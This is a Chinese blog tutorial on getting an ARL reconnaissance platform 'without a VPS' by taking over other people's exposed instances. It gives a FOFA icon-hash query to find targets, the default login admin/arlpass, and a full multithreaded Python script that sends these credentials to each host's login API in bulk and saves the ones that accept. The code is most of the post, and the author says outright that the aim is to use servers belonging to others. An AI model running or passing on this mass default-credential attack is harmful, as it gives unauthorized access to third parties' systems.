您现在的位置是:首页 >技术教程 >ARL灯塔(无需VPS版)网站首页技术教程

ARL灯塔(无需VPS版)

救救直男吧! 2023-07-16 12:00:02
简介ARL灯塔(无需VPS版)

标题随便写,能看到都是有缘人

搭建灯塔那么繁琐的步骤,远不如爆破一个灯塔是吧(狗头)

而且还可能买不起VPS的情况(例如我)   那不如写一个脚本去爆破灯塔的弱口令

整治网络安全 从你我做起

fofa语法:     icon_hash="1708240621"

首先去百度下灯塔的默认账号密码

admin/arlpass

 默认密码有了,写脚本

import requests
import urllib3

from concurrent.futures import ThreadPoolExecutor
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


with open('1.txt', 'r') as f:
    urls = [line.strip() for line in f]

data = {"username": "admin", "password": "arlpass"}

def send_request(url):
    url = url.replace("{1}", "").strip() + "/api/user/login"
    try:
        response = requests.post(url, json=data, timeout=5, verify=False)
        if "token" in response.text:
            with open('2.txt', 'a') as f:
                f.write(f'{url}' + '
')
            print(f"{url}:  ==存在弱口令")
        else:
            print(f"{url}:  no")
    except requests.exceptions.Timeout:
        print(f"{url}: 超时")
    except requests.exceptions.RequestException as e:
        print(f"{url}: 无法访问:{e}")
    except ValueError as e:
        print(f"{url}: 异常:{e}")

# 线程
max_workers = 10

with ThreadPoolExecutor(max_workers=max_workers) as executor:
    futures = [executor.submit(send_request, url) for url in urls]

    for future in futures:
        future.result()

print("所有请求已完成!")

fofa语法:     icon_hash="1708240621"

 主打的就是一个批量。

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。